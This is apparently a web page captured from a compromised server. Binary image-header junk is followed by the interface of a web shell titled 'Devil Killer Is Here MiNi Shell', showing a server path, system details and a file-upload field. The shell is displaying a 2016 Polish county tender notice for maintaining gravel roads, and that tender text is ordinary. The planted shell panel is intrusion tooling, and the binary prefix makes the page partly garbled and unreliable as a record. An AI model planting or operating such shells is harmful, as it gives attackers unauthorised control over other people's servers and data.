JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160225/42624-N-2016.html

<p class="kh_header"><b>Nowy Dwór Mazowiecki: PRACE Z ZAKRESU BIEŻĄCEGO UTRZYMANIA DRÓG - PROFILOWANIE, ZAGĘSZCZENIE ORAZ NAPRAWA NAWIERZCHNI DRÓG GRUNTOWYCH (W TYM POBOCZY), UZUPEŁNIANIE LOKALNYCH UBYTKÓW I ZANIŻEŃ POBOCZY GRUNTOWYCH W CIĄGU DRÓG POWIATOWYCH NA TERENIE POWIATU NOWODWORSKIEGO</b><br>
<b>Numer ogłoszenia: 42624 - 2016; data zamieszczenia: 25.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowodworski , ul. Ignacego Paderewskiego 1B, 05-100 Nowy Dwór Mazowiecki, woj. mazowieckie, tel. 22 765 32 90, faks 22 765 32 91.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowodworski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRACE Z ZAKRESU BIEŻĄCEGO UTRZYMANIA DRÓG - PROFILOWANIE, ZAGĘSZCZENIE ORAZ NAPRAWA NAWIERZCHNI DRÓG GRUNTOWYCH (W TYM POBOCZY), UZUPEŁNIANIE LOKALNYCH UBYTKÓW I ZANIŻEŃ POBOCZY GRUNTOWYCH W CIĄGU DRÓG POWIATOWYCH NA TERENIE POWIATU NOWODWORSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólna  charakterystyka  dróg  będących  w  utrzymaniu  Zarządu  Powiatu :
1.  Łączna  długość  dróg  powiatowych  administrowanych przez Powiat Nowodworski  wynosi - 237,373  km,  w  tym  drogi  o  nawierzchni  bitumicznej  stanowią  192,594  km,  pozostałe 44,779  km  to  drogi  o nawierzchni nieulepszonej. Zadanie  obejmuje drogi powiatowe na terenie Gmin: Nowy Dwór Maz., Czosnów, Leoncin , Zakroczym, Pomiechówek , Nasielsk -  objętych przedmiotem zamówienia jest 38.920 km dróg gruntowych.
2. Zamówienie  obejmuje  prace  z  zakresu  bieżącego  utrzymania  dróg  polegające  na :
Profilowaniu, zagęszczeniu ,  naprawach  nawierzchni  dróg  gruntowych ,  uzupełnianiu  lokalnych  ubytków poboczy  gruntowych , ścinanie poboczy, odtwarzanie rowów przy drogach  na  terenie  Powiatu  Nowodworskiego.  
3.W  zakresie  profilowania  oraz  napraw  nawierzchni  dróg  gruntowych  zamówienie  obejmuje  wykonanie  prac  zgodnie  ze  szczegółowym  wykazem  robót ;
- oczyszczenie  miejsc  uszkodzonych,
- uzupełnienie  miejsc  uszkodzonych  ( ubytków,  odkształceń )  kruszywem  oraz  jego zagęszczenie,
- mechaniczne  profilowanie  drogi  równiarką  samojezdną  do  uzyskania  żądanego  profilu  i  spadków,
- mechaniczne  zagęszczenie  profilowanej  nawierzchni  gruntowej  walcem  samojezdnym.
4.W  zakresie  napraw  lokalnych  uszkodzeń  poboczy  zamówienie  obejmuje  wykonanie  następujących  prac :

- wykonanie  prac  przygotowawczych,
- spulchnienie  gruntu  w  miejscu  naprawy  na  głęb.  2-3  cm  ( w  obrysie  uszkodzenia  oraz  w  razie  konieczności  nawilgocenie  gruntu  podłoża),
- wypełnienie  ubytku  gruntem  oraz  jego  zagęszczenie  zgodnie  z  obowiązującą  normą,
- wyrównanie  naprawianych  miejsc  do  spadku  poprzecznego  zgodnego  ze  spadkiem  istniejącego  pobocza .     
5.  Obejmujący  zamówienie  zakres  robót  przyjęty  został  jako  średni  w  stosunku  do  prac prowadzonych  w  latach  ubiegłych,  i  służy do porównania złożonych ofert.    
6.  Roboty  stanowiące  przedmiot  zamówienia  wykonywane  będą  na  podstawie  pisemnych zleceń wystawionych  przez  Zamawiającego  z  określeniem  ich  zakresu,  terminu wykonania,  umiejscowienia  oraz  wartości  wynikającej  z  zaproponowanych  przez  Wykonawcę  cen  jednostkowych.
7.  Wykonawca  zobowiązany  jest  przystąpić  do  realizacji  prac  określonych  w  zleceniu   w  terminie  3  dni  od  jego  otrzymania.
8.  W  przypadku  usuwania  awarii  gdzie  zachodzi  konieczność  natychmiastowego wykonania  usługi Zamawiający może zażądać od Wykonawcy jej wykonania w terminie 24 godz. od daty  otrzymania  zlecenia. 
9. Wymagania dotyczące wykonywania i odbioru robót określono w załączonych  Szczegółowych                                                                                                Specyfikacjach Technicznych.
10.  Czas  obowiązywania  umowy  na  wykonanie  prac  objętych  przedmiotem  zamówienia Zamawiający  określa  na  okres  od  dnia  jej  zawarcia  do  15.12.2016 r.
11. Minimalny wymagany przez Zamawiającego okres gwarancji na wykonane roboty: 3 miesiące od daty sporządzenia końcowego protokołu odbioru danej partii robót; z uwagi na fakt, iż okres gwarancji został wyznaczony przez Zamawiającego jako pozacenowe kryterium oceny ofert, Zamawiający wyznacza maksymalny punktowany okres gwarancji na 6 miesięcy od daty sporządzenia końcowego protokołu odbioru danej partii robót; szczegółowe informacje w tym zakresie wskazane są w części XIX SIWZ - Opis kryteriów, którymi Zamawiający będzie się kierował przy wyborze oferty wraz z podaniem tych kryteriów i sposobu oceny ofert; w przyszłej umowie o zamówienie publiczne okres rękojmi za wady przedmiotu zamówienia ustalony zostanie na czas, jaki Wykonawca wskazał  w ofercie dla okresu gwarancji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>W niniejszym postępowaniu Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w okresie 3 lat od udzielenia zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 6 prawa zamówień publicznych, polegających na powtórzeniu tego samego rodzaju zamówień i zgodnych z przedmiotem zamówienia podstawowego o wartości nie przekraczającej 50% wartości szacunkowej zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do postępowania w sprawie udzielenia zamówienia publicznego obowiązany jest - pod rygorem nieważności oferty, wnieść wadium w kwocie:                                                                                                                                                                               3 000,00 zł, (słownie: trzy tysiące złotych)
2.	Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych,  gwarancjach ubezpieczeniowych oraz poręczeniach  udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2007r. Nr 42, poz.275 
z późn. zm.)
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego, 
tj.: Polski Bank Spółdzielczy w Ciechanowie, Oddział Płońsk:

numer rachunku bankowego:  78 8213 0008 2006 0803 0340 0012 

      W przypadku wpłaty przelewem, Zamawiający uzna wadium za wniesione skutecznie, jeżeli 
      w dniu 11.03.2016r.  do godz. 11:30  będzie ono na koncie depozytowym Zamawiającego.     

Kopię dowodu wpłaty należy załączyć do oferty.

4.	Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez Polską  Agencję  Rozwoju  Przedsiębiorczości, należy złożyć w siedzibie Zamawiającego, w Nowym Dworze Maz. przy ul. Ignacego Paderewskiego 1B, w pok. 117A (I piętro) przed upływem terminu składania ofert, tj: do dnia 11.03.2016r., do godz. 1130.  Nie należy załączać oryginału dokumentu wadialnego do oferty. Do oferty należy załączyć jedynie kserokopię dowodu wniesienia wadium.
5.	Wadium wnoszone w poręczeniach lub gwarancjach musi zawierać zobowiązanie gwaranta do zapłaty sumy wadialnej na rzecz Zamawiającego bezwarunkowo i na pierwsze pisemne żądanie Zamawiającego w terminie związania ofertą, jeżeli zaistnieją przesłanki do zatrzymania wadium, określone w art. 46 ust. 4a i 5 p.z.p.
6.	 Wadium zostanie zwrócone wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania (z zastrzeżeniem art. 46 ust. 4a ustawy - Prawo zamówień publicznych), z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. 
7.   Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium 
      niezwłocznie po zawarciu umowy w sprawie udzielenia zamówienia publicznego.
8.   Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofa ofertę przed 
      upływem terminu składania ofert.
9.   Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium 
      zgodnie z pkt 6, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta zostanie wybrana  jako 
      najkorzystniejsza.
10.	Jeżeli  wadium  wniesiono  w  pieniądzu,  Zamawiający  zwraca  je  wraz  z  odsetkami  
wynikającymi  z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
11.  Zamawiający, zgodnie z art. 46 ust. 5 p.z.p.,  zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza:
a)	 odmówi  podpisania  umowy w sprawie zamówienia publicznego na warunkach określonych
 w ofercie,
b) zawarcie  umowy w sprawie zamówienia publicznego stanie  się  niemożliwe,  z  przyczyn    leżących  po  stronie  Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, 
Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca musiałby wykazać w sposób szczególny.
     Ocena spełnienia tego warunku zostanie dokonana przez Zamawiającego wg formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 44 ustawy - Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania wiedzy i doświadczenia  Zamawiający uzna wykazanie przez Wykonawcę, iż w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał w sposób należyty, zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną (robotę zrealizowaną w ramach jednej umowy/jednego zlecenia), polegającą na wykonaniu profilowania, zagęszczenia oraz naprawach nawierzchni dróg gruntowych, o wartości nie mniejszej niż 90 000,00 zł brutto.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, są oni zobowiązani wykazać, iż stawiany przez Zamawiającego warunek posiadania wiedzy 
i doświadczenia, spełnia w całości co najmniej jeden z nich. 
    
W przypadku Wykonawców powołujących się na zasoby podmiotów trzecich na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych w celu wykazania spełnienia niniejszego warunku, są oni zobowiązani wykazać, iż stawiany przez Zamawiającego warunek w zakresie posiadania wiedzy i doświadczenia, spełniają w całości samodzielnie - lub 
w całości jest on spełniony przez podmiot trzeci, na zasoby którego Wykonawca się powołuje.

Ocena spełnienia warunku posiadania wiedzy i doświadczenia dokonana zostanie przez Zamawiającego wg formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawcę dokumenty wskazane w pkt 2.1 oraz 2.2 części VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Dysponowania odpowiednim potencjałem technicznym, Zamawiający uzna wykazanie przez Wykonawcę, iż dysponuje następującym sprzętem: co najmniej jedną równiarką oraz co najmniej jednym walcem samojezdnym do zagęszczenia podłoża. 

      W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, są oni 
      zobowiązani wykazać, iż stawiany przez Zamawiającego warunek dysponowania odpowiednim 
      potencjałem technicznym, spełniają wspólnie (łącznie).
      W przypadku Wykonawców powołujących się na zasoby podmiotów trzecich na zasadach 
      określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych w celu wykazania 
      spełnienia niniejszego warunku, są oni zobowiązani wykazać, iż stawiany przez Zamawiającego 
      warunek w zakresie dysponowania odpowiednim potencjałem technicznym, spełniają wspólnie 
      (łącznie) z podmiotem trzecim, na zasoby którego się powołują.

      Ocena spełnienia warunku dysponowania odpowiednim potencjałem technicznym dokonana 
      zostanie przez Zamawiającego wg formuły spełnia - nie spełnia w oparciu o przedłożone przez 
      Wykonawcę dokumenty wskazane w pkt 2.1 oraz 2.3 części VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca musiałby wykazać w sposób szczególny.
Ocena spełnienia tego warunku zostanie dokonana przez Zamawiającego wg formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 44 ustawy - Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnośnie warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawcy - 
Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca musiałby wykazać w sposób szczególny. Ocena spełnienia tych warunków zostanie dokonana przez Zamawiającego wg formuły spełnia - nie spełnia w oparciu o przedłożone przez Wykonawcę oświadczenie o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 44 ustawy - Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz cenowy - wzór przedmiotowego dokumentu stanowi załącznik nr 3a do SIWZ,
2. dokument (lub dokumenty)- w szczególności pisemne zobowiązanie-potwierdzający/ce 
oddanie przez podmioty trzecie - na zasadach określonych w art. 26 ust.2b p.z.p. - do 
dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (jeśli 
dotyczy);  wymogi wobec przedmiotowego dokumentu/ów wskazano w pkt 5 części V SIWZ, 
3. pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia,
4. pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, w przypadku, gdy 
dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentacji 
Wykonawcy zgodnie z odpowiednim dokumentem rejestrowym,
5.   kserokopia dowodu wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 88</li>
<li>2 - okres gwarancji - 12</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 p.z.p.  Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w następujących przypadkach i na następujących warunkach:
1) zmiany obejmować mogą zakres świadczenia, o ile nie spowodują wykroczenia poza określenie przedmiotu zamówienia zawartego w specyfikacji istotnych warunków zamówienia, zmiany te  obejmować mogą postanowienia odnoszące się do zakresu robót w poszczególnych asortymentach w wyniku braku możliwości dokonania szczegółowego przedmiaru i dokładnego oszacowania ilości niezbędnych remontów - przy założeniu nieprzekroczenia maksymalnego wynagrodzenia przedmiotu umowy, wynikającego ze złożonej oferty,    
2)  zmiany obejmować mogą termin wykonania, zmiana terminu wykonania robót możliwa będzie w przypadku konieczności wstrzymania prac na skutek okoliczności niezależnych od Wykonawcy, w szczególności takich jak:
a) wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających prowadzenie  robót (np. opady śniegu, deszczu, temperatury poniżej 00C),
b) przyczyny techniczne (np. kolizja z niezinwentaryzowanym uzbrojeniem podziemnym, 
             niewybuchy),
c) przyczyny organizacyjne (brak możliwości wykonania robót ze względu na uniemożliwiony   dostęp do pasa drogowego),
d) przypadki siły wyższej (np. huragan, powódź, inne kataklizmy).
3)  zmiany obejmować mogą wysokość wynagrodzenia, spowodowaną zmianą stawki podatku VAT, kiedy to wynagrodzenie Wykonawcy zostanie dostosowane do obowiązujących przepisów prawa w tym zakresie,
4) zmiany lub rezygnacji z udziału w realizacji zamówienia zgłoszonych Zamawiającemu podwykonawców, jeżeli Wykonawca - w celu spełniania warunków udziału w postępowaniu - powoływał się na ich zasoby na zasadach określonych w art. 26 ust. 2b, pod warunkiem wykazania Zamawiającemu, iż proponowany podwykonawca lub Wykonawca samodzielnie spełnia te warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4. Wszelkie zmiany do zawartej umowy wymagają sporządzenia aneksu w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
